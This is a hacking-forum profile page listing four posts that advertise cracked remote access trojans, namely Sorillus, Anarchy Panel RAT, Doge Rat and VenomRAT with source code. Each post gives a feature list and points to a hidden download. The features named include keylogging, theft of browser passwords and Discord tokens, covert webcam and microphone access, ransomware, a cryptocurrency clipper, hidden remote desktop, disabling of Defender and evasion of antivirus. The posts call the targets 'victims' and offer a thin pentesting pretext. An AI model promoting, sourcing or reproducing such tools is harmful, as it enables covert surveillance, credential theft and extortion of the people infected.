Jump to content

hebir16994

+ Member
  • Posts

    13
  • Joined

  • Last visited

About hebir16994

hebir16994's Achievements

Rookie

Rookie (1/19)

  • One Month Later
  • First Post Rare

Recent Badges

8

Reputation

  1. [center][img]https://i.postimg.cc/8zRz6jZZ/Screenshot-1.png[/img][/center] [center][b]Sorillus Rat Cracked[/b][/center] ========== [center] Sorillus is Remote Access Trojan written in Java, that means that Server and Client is running on all operating systems (e.g. Windows, Linux, Mac). What is Sorillus Rat? Sorillus is a platform-independent R.A.T (Remote Access Trojan) written in Java, that can help a pentester to get full remote access to any device that can run Java. This rat can infect Linux devices as well as mac os and other os like widows. their developer is planning to make a new version that can hack android as well so its not just a cross-platform rat its stub is also cross-platform supported. Features System: •Pop-up: Display pop-up messages on the victims' screen. •Clipboard: Access and manage the victim's clipboard contents. •Open URL: Open a specified URL on the victim's browser. •Show IP: Retrieve and display the victim's IP address. •Report: Generate and send reports regarding system status and activities. •Shutdown: Remotely shut down the victim's system. Surveillance: •Screenshot: Capture screenshots of the victim's screen. •Remote desktop: View and control the victim's desktop remotely. •Remote cam: Access and view the victim's webcam remotely. •Remote microphone: Listen to audio from the victim's microphone remotely. •Key logger: Record and monitor keystrokes on the victim's system. Fun: •Play sound: Play customized sounds on the victim's system. •Black screen: Turn the victim's screen black for privacy or focus purposes. •Image walk: Display a series of images in a slideshow format. Contact: •Text-Chat: Engage in text-based communication with the victim. Custom: •Alias: Assign customized aliases or names to victims for easier identification. •Notes: Add and manage personal notes or annotations for each victim. Debug: •Thread: Monitor and manage threads within the application. •Instances: Track and manage multiple instances of the application. Advanced Controls: •Remote Shell: Execute remote commands on the victim's system. •File Manager: Access and manage files and directories on the victim's system. •Processes: View and manage running processes on the victim's system. •Password Recovery: Recover passwords from supported browsers. •Plugins: Extend the functionality of the application with custom plugins. •Close Views: Close specific views or modules within the application. Installation: •Add Autostart: Add payload to the auto start folder so it will automatically start with startup apps. •Update Client: Update the victim's payload to the latest version. •Uninstall & Disconnect: Remove the client software and disconnect from the system. Connection: •Reconnect: Reconnect a connection with a previously connected victim. •Disconnect: Disconnect the connection with a victim. [Hidden Content] [/center]
  2. [center][img]http://blankhack.com/wp-content/uploads/2023/06/Screenshot_1.png[/img][/center] [center][b]ANARCHY PANEL RAT 4.7 Cracked[/b][/center] ========== [center] Tools:Icon Changer - Multi Binder [Icon - Assembly] | Fud Downloader [HTA-VBS-JS-WSF] - XHVNC - BlockClients Features: Information, Monitor [Mouse - Keyboard - AutoSave] , Run File [Disk - Link - Memory - Script - RunPE] , WebCam [AutoSave] , Microphone , System Sound , Open Url [Visible - Invisible] , TCP Connections , ActiveWindows , Process Manager , Clipboard Manager , Shell , Installed Programs , DDos Attack , VB.Net Compiler , Location Manager [GPS - IP] , File Manager , Client [Restart - Close - Uninstall - Update - Block - Note] Options: Power [Shutdown - Restart - Logoff] , BlankScreen [Enable - Disable] , TaskMgr [Enable - Disable] , Regedit [Enable - Disable] , UAC [Enable - Disable] , Firewall [Enable - Disable] ,.NET 3.5 Install , Disable Update , Run Shell, Invoke-BSOD Password Recovery : Bookmarks - Browsers - All-In-One - DicordTokens , FileZilla - ProduKey - WifiKeys - Email Clients Pastime : CD ROOM [Open - Close] , DesktopIcons [Show - Hide] , SwapMouse [Swap - Normal] , TaskBar [Show - Hide] , Screen [ON-OFF] , Volume [Up - Down - MUTE] , Start [Show - Hide] , Clock [Show - Hide] , Text Speak , Explorer [Start - Kill] , Tray Notify [Show - Hide] Extra 1 : KeyLogger , Client Chat ,FileSeacher ,USB Spread , Bot killer , PreventSleep , Message Box ,Change Wallpaper , DeleteRestorePoints , UAC Bypass [RunAs - Cmstp - Computerdefaults - DismCore] , Run Clipper [All Cryptocurrencies] Extra 2 : Ransomware [Encrypt - Decrypt] , Ngrok Installer , HVNC , Hidden RDP ,WDDisable , W.D.Exclusion , Install [Startup - Registry - schtasks] Requirements : ? .Net Framework 4.5 [Controller] ? .NET Framework 4.0 [Client] https://www.virustotal.com/gui/file/50c2dba1d961e09cb8df397b71bd3b6a32d0ee6dbe886e7309305dc4ba968f94 [Hidden Content] [/center]
  3. [center][img]http://blankhack.com/wp-content/uploads/2023/06/68747470733a2f2f646f67656c696e612e636f6d2f646f67732f7363722e6a7067-scaled.jpg[/img][/center] [center][b]Doge Rat[/b][/center] ========== [center] Features Real time custom web view notification reader notification sender (send custom notification that apper on target device with custom click link) show toast message on target device (Toasts are messages that appear in a box at the bottom of the device) receive information about simcard provider vibrate target device receive device location receive all target message send sms with target device to any number send sms with target device to all of his/her contacts recive all target contacts receive list of all installedd apps in target device receive any file or folder from target device delete any file or folder from target device capture main and front camera capture microphone (with custom duration) receive last clipboard text auto start after device boot Keylogger {Availbe in apk v1 and v2} Beautiful telegram bot interface - Undetectable by antivirus [Hidden Content] [/center]
  4. [center][img]http://blankhack.com/wp-content/uploads/2023/06/Screenshot_2.png[/img][/center] [center][b] VenomRAT 6.0.3 CRACKED + HVNC + STEALER & GRABBER + SOURCE CODE[/b][/center] ========== [center] A "dream-come-true" for hackers and penetration testers, Venom RAT has managed to bring the best of both worlds into a single tool. You will be able to test your users by having direct RAT access to their systems, and then deploy advanced HVNC, while monitoring all their actions through a Keylogger, and many more plugins for your environment [banner_200x200] {banner_200x200} [/banner_200x200] Hidden Desktop Hidden Firefox Hidden Chrome Hidden Browser Hidden Edge Hidden Explorer System Information File Manager Start Up Manager Task Manager Remote SHell TCP Connection Auto Task Registry Editor UAC Exploit Disable WD Mic Record Download and Execute to disk Memory Thumbnail Active Scheduler Remote Fun Monitor On / Off Open / Close CD Show/Hide Taskbar Show / Hide Explorer SHow / Hide CLock Show / Hide Tray Show / Hide Mouse Enable / Disable Task Mgr Enable / Disable Regedit Disable UAC Remove Scheduler Token DIscord Recovery CLient Update Much More Stub Features Change CLient Name Disable Defender Change Registry Name Enable Install Hide File Encrypted Connection USB Spread Hide Folder Change Assembly CLone Anti Kill Start Up Persistence Export as Shell Code Enable Keylogger offline online Password Recovery 360 Browser Yandex Browser Firefox Browser Chrome Browser Edge Browser Oper Browser UcozMedia Coowon Liebao Brwoser Comodo Dragon Srware iron Amigo Kometa Citrio QIP Surf Torch Browser CoolNovo Brave Browser Cent Browser Epic Privacy Browser Chedot Elements Browser Orbitum Browser 7Star Browser Ridium Browser Sleipnir 6 Sputnik Vivaldi Cococ Venom Rat + Hvnc features include all the feaure of venom rat Hvnc Clone Profile Hidden Desktop Hidden Browser Support Web Gl Hidden Chrome Hidden Firefox Hidden Edge Explorer Hidden Power Shell Hidden Brave Hidden Start Up Reverse Connection Remote Download and execute https://www.virustotal.com/gui/file/7331368c01b2a16bda0f013f376a039e6aeb4cb2dd8b0c2afc7ca208fb544c58 [Hidden Content] [/center] venom rat,venom rat cracked

Board Life Status


Board startup date: October 30, 2017 06:45:19
×
×
  • Create New...